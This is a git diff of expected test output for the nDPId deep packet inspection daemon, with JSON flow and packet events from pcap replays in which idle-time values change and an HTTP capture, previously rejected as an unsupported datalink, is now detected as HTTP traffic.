-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614898090218,"flow_last_seen":1614898090218,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614898090218,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1614898090218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614898090218,"pkt":"eJS0JASgYDjgxTWgCABFAAA8EFJAAD8GBe\/AqAJkoCzCQqcMFGeOCpYjAAAAAKAC\/\/+UDgAAAgQFtAQCCAoBYq1xAAAAAAEDAwg="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1614898090245,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614898090245,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnpwwosEHQjgqWJGASchC2bwAAAgQFrAAA"} 
-00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1614898090249,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614898090249,"pkt":"eJS0JASgYDjgxTWgCABFAAAoEFNAAD8GBgLAqAJkoCzCQqcMFGeOCpYkKLBB0VAQ\/\/9ANQAA"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614898090218,"flow_last_seen":1614898090270,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614898090270,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614894888601,"flow_last_seen":1614895277767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614898090218,"flow_last_seen":1614898324173,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614892184461,"flow_last_seen":1614892314046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614898090218,"flow_last_seen":1614898090218,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614898090218,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1614898090218,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614898090218,"pkt":"eJS0JASgYDjgxTWgCABFAAA8EFJAAD8GBe\/AqAJkoCzCQqcMFGeOCpYjAAAAAKAC\/\/+UDgAAAgQFtAQCCAoBYq1xAAAAAAEDAwg="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1614898090245,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614898090245,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnpwwosEHQjgqWJGASchC2bwAAAgQFrAAA"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1614898090249,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614898090249,"pkt":"eJS0JASgYDjgxTWgCABFAAAoEFNAAD8GBgLAqAJkoCzCQqcMFGeOCpYkKLBB0VAQ\/\/9ANQAA"} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614898090218,"flow_last_seen":1614898090270,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614898090270,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614894888601,"flow_last_seen":1614895277767,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614898090218,"flow_last_seen":1614898324173,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614892184461,"flow_last_seen":1614892314046,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":135,"packets-processed":135,"total-skipped-flows":0,"total-l4-data-len":5105,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":9,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":64,"global_ts_msec":1614898324173} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 135/135 diff --git a/test/results/http-crash-content-disposition.pcap.out b/test/results/http-crash-content-disposition.pcap.out index 3e3052f77..ea7dd0e7c 100644 --- a/test/results/http-crash-content-disposition.pcap.out +++ b/test/results/http-crash-content-disposition.pcap.out 
@@ -1,36 +1,24 @@ 00481{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00567{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1492518365663} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":1,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365663} -00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPNS7QABABvZlwKgAZ66BAArH4wBQe0WpbgAAAACgAjkINI0AAAIEBbQEAggKABR91QAAAAABAwMG"} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":2,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365767} 
-00356{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPAAAQAAtBt4hroEACsCoAGcAUMfjkVcfantFqW+gEjiQ\/PYAAAIEBawEAggKK6FboQAUfdUBAwMH"} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":3,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365789} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANNS8QABABvZswKgAZ66BAArH4wBQe0Wpb5FXH2uAEADlY08AAAEBCAoAFH3sK6FboQ=="} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":4,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365809} 
-00919{"packet_event_id":1,"packet_event_name":"packet","packet_id":4,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":480,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":480,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAB4NS9QABABvS\/wKgAZ66BAArH4wBQe0Wpb5FXH2uAGADlVxoAAAEBCAoAFH3uK6FboVBPU1QgL2ltZXNzYWdlcy5waHA\/c29uZ2lmeV9hPTNoMjQ4Zklid0ombmV3IEhUVFAvMS4xDQpDb250ZW50LUxlbmd0aDogMjIwDQpDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PTV2N0xoYm5hMnJld0hyajBlX0Y4d3IwV0FWVHBZOTNFVDlpUUhEeQ0KSG9zdDoga2h1LnNoDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBBcGFjaGUtSHR0cENsaWVudC9VTkFWQUlMQUJMRSAoamF2YSAxLjQpDQoNCi0tNXY3TGhibmEycmV3SHJqMGVfRjh3cjBXQVZUcFk5M0VUOWlRSER5DQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImlzYW5kcm9pZCINCkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbjsgY2hhcnNldD1VUy1BU0NJSQ0KQ29udGVudC1UcmFuc2Zlci1FbmNvZGluZzogOGJpdA0KDQox"} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":5,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365809} -00407{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":99,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":99,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAY9S+QABABvY7wKgAZ66BAArH4wBQe0WrG5FXH2uAGADlbXAAAAEBCAoAFH3uK6FboQ0KLS01djdMaGJuYTJyZXdIcmowZV9GOHdyMFdBVlRwWTkzRVQ5aVFIRHktLQ0K"} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":6,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365913} 
-00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANEN0QAAtBpq1roEACsCoAGcAUMfjkVcfa3tFqxuAEAB6YXsAAAEBCAoroVwyABR97g=="} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":7,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365913} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":7,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANEN1QAAtBpq0roEACsCoAGcAUMfjkVcfa3tFq0qAEAB6YUsAAAEBCAoroVwzABR97g=="} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":8,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365968} 
-02271{"packet_event_id":1,"packet_event_name":"packet","packet_id":8,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1492,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1492,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAF1EN2QAAtBpUTroEACsCoAGcAUMfjkVcfa3tFq0qAEAB6GowAAAEBCAoroVxpABR97khUVFAvMS4xIDIwMCBPSw0KU2VydmVyOiBuZ2lueA0KRGF0ZTogVHVlLCAxOCBBcHIgMjAxNyAxMjoxOToyNSBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC9odG1sOyBjaGFyc2V0PVVURi04DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpYLVBvd2VyZWQtQnk6IFBIUC81LjMuMw0KQ29udGVudC1MZW5ndGg6IDIxODcNCg0KPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4KPGltc2dzPgo8dGltZXN0YW1wPjEzNTgyNzg0NTA8L3RpbWVzdGFtcD4KPGZyZXF1ZW50bHlfc2hvdz4zPC9mcmVxdWVudGx5X3Nob3c+CjxmcmVxdWVudGx5X3Nob3dfZmlyc3Q+MzwvZnJlcXVlbnRseV9zaG93X2ZpcnN0Pgo8bWVzc2FnZV9saXN0PgoJPG1lc3NhZ2U+CgkJPGlkPjE4PC9pZD4KCQk8dGl0bGU+RnJvbSBCcnVubyBNYXJzIHRvIFJpaGFubmE8L3RpdGxlPgoJCTxkZXNjcmlwdGlvbj5QbGF5IHRoZSBob3R0ZXN0IHNvbmdzIGVmZm9ydGxlc3NseSBvbiB0aGUgIzEgcGlhbm8gYXBwITwvZGVzY3JpcHRpb24+CgkJPHVybD5odHRwOi8vYXBpLnNtdWxlLmNvbS92Mi9yZWRpcmVjdC9leUozWldKVmNtd2lPaUpvZEhSd09pOHZjR3hoZVM1bmIyOW5iR1V1WTI5dEwzTjBiM0psTDJGd2NITXZaR1YwWVdsc2N6OXBaRngxTURBelpHTnZiUzV6YlhWc1pTNXRZV2RwWTNCcFlXNXZJaXdpYlc5aWFXeGxWWEpzSWpvaWJXRnlhMlYwT2k4dlpHVjBZV2xzY3o5cFpGeDFNREF6WkdOdmJTNXpiWFZzWlM1dFlXZHBZM0JwWVc1dklpd2lZMkZ0Y0dGcFoyNUpaQ0k2TVRReU1pd2lZWEJ3SWpvaVRVbE9TVkJKUVU1UFgwRk9SRkpQU1VRaWZRPT08L3VybD4KCQk8dHlwZT4wPC90eXBlPgoJCTxjYXRlZ29yeT4zPC9jYXRlZ29yeT4KCQk8bWF4X2Rpc3BsYXlfbnVtPjIxNDUxMzc2MzQ8L21heF9kaXNwbGF5X251bT4KCTwvbWVzc2FnZT4KCTxtZXNzYWdlPgoJCTxpZD4xNzwvaWQ+CgkJPHRpdGxlPkRvd25sb2FkIFNpbmchIEthcmFva2UgZm9yIEZSRUU8L3RpdGxlPgoJCTxkZXNjcmlwdGlvbj5TaW5nIHNvbmdzIGJ5IDFELCBDYXJseSBSYWUgSmVwc2VuLCBCaWViZXIgJmFtcDsgbW9yZSE8L2Rlc2NyaXB0aW9uPgoJCTx1cmw+aHR0cDovL2FwaS5zbXVsZS5jb20vdjIvcmVkaXJlY3QvZXlKM1pXSlZjbXdpT2lKb2RIUndjem92TDNCc1lYa3VaMjl2WjJ4bExtTnZiUzl6ZEc5eVpTOWhjSEJ6TDJSbGRHRnBiSE0vYVdSY2RUQXdNMlJqYjIwdWMyMTFiR1V1YzJsdVoyRnVaSEp2YVdRaUxDSnRiMk
pwYkdWVmNtd2lPaUp0WVhKclpYUTZMeTlrWlhSaGFXeHpQMmxrWEhVd01ETmtZMjl0TG5OdGRXeGxMbk5wYm1kaGJtUnliMmxrSWl3aVkyRnRjR0ZwWjI1SlpDSTZNVEV4T0N3aVlYQndJam9pVTBsT1IxOUhUMDlIVEVVaWZRPT08L3VybD4KCQk8dHlwZT4wPC90eXBlPgoJCTxjYXRlZ29yeT4xPC9jYXRlZ29yeT4KCQk8bWF4X2Rpc3BsYXlfbnVtPjY3NzM5MA=="} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365968} -01585{"packet_event_id":1,"packet_event_name":"packet","packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":981,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":981,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAD1UN3QAAtBpcRroEACsCoAGcAUMfjkVclC3tFq0qAGAB6wJEAAAEBCAoroVxpABR97jQ8L21heF9kaXNwbGF5X251bT4KCTwvbWVzc2FnZT4KCTxtZXNzYWdlPgoJCTxpZD4yMDwvaWQ+CgkJPHRpdGxlPkEgUGVwIFRhbGsgZnJvbSBLaWQgUHJlc2lkZW50ITwvdGl0bGU+CgkJPGRlc2NyaXB0aW9uPldhdGNoIHRoZSBuZXdlc3QgdmlkZW8gZnJvbSBUaGUgR3JlZ29yeSBCcm90aGVycywgYW5kIHBlcmZvcm0geW91ciBvd24gcmVuZGl0aW9uITwvZGVzY3JpcHRpb24+CgkJPHVybD5odHRwOi8vd3d3LnlvdXR1YmUuY29tL3dhdGNoP3Y9bkZHY3JZUGRySlU8L3VybD4KCQk8dHlwZT4wPC90eXBlPgoJCTxjYXRlZ29yeT4xPC9jYXRlZ29yeT4KCQk8bWF4X2Rpc3BsYXlfbnVtPjIxNDYzNTQyNDg8L21heF9kaXNwbGF5X251bT4KCTwvbWVzc2FnZT4KCTxtZXNzYWdlPgoJCTxpZD4yMTwvaWQ+CgkJPHRpdGxlPlJhcCBsaWtlIEVtaW5lbSE8L3RpdGxlPgoJCTxkZXNjcmlwdGlvbj5BdXRvUmFwIHR1cm5zIHNwZWVjaCBpbnRvIHJhcCAoYW5kIGNvcnJlY3RzIGJhZCByYXBwaW5nKS48L2Rlc2NyaXB0aW9uPgoJCTx1cmw+aHR0cDovL2FwaS5zbXVsZS5jb20vdjIvcmVkaXJlY3QvZXlKM1pXSlZjbXdpT2lKb2RIUndjem92TDNCc1lYa3VaMjl2WjJ4bExtTnZiUzl6ZEc5eVpTOWhjSEJ6TDJSbGRHRnBiSE0vYVdSY2RUQXdNMlJqYjIwdWMyMTFiR1V1WVhWMGIzSmhjQ0lzSW0xdlltbHNaVlZ5YkNJNkltMWhjbXRsZERvdkwyUmxkR0ZwYkhNL2FXUmNkVEF3TTJSamIyMHVjMjExYkdVdVlYVjBiM0poY0NJc0ltTmhiWEJoYVdkdVNXUWlPakUxTVRNc0ltRndjQ0k2SWtGVlZFOVNRVkJmUjA5UFJ5Sjk8L3VybD4KCQk8dHlwZT4wPC90eXBlPgoJCTxjYXRlZ29yeT4zPC9jYXRlZ29yeT4KCQk8bWF4X2Rpc3BsYXlfbnVtPjIxNDYwNzU0MDI8L21he
F9kaXNwbGF5X251bT4KCTwvbWVzc2FnZT4KPC9tZXNzYWdlX2xpc3Q+CjwvaW1zZ3M+"} -00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","packets-captured":9,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1492518365968} +00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492518365663,"flow_last_seen":1492518365663,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492518365663,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"174.129.0.10","src_port":51171,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1492518365663,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1492518365663,"pkt":"RQAAPNS7QABABvZlwKgAZ66BAArH4wBQe0WpbgAAAACgAjkINI0AAAIEBbQEAggKABR91QAAAAABAwMG"} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1492518365767,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1492518365767,"pkt":"RQAAPAAAQAAtBt4hroEACsCoAGcAUMfjkVcfantFqW+gEjiQ\/PYAAAIEBawEAggKK6FboQAUfdUBAwMH"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1492518365789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1492518365789,"pkt":"RQAANNS8QABABvZswKgAZ66BAArH4wBQe0Wpb5FXH2uAEADlY08AAAEBCAoAFH3sK6FboQ=="} +00839{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492518365663,"flow_last_seen":1492518365809,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":428,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1492518365809,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"174.129.0.10","src_port":51171,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"khu.sh","url":"khu.sh\/imessages.php?songify_a=3h248fIbwJ&new","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 
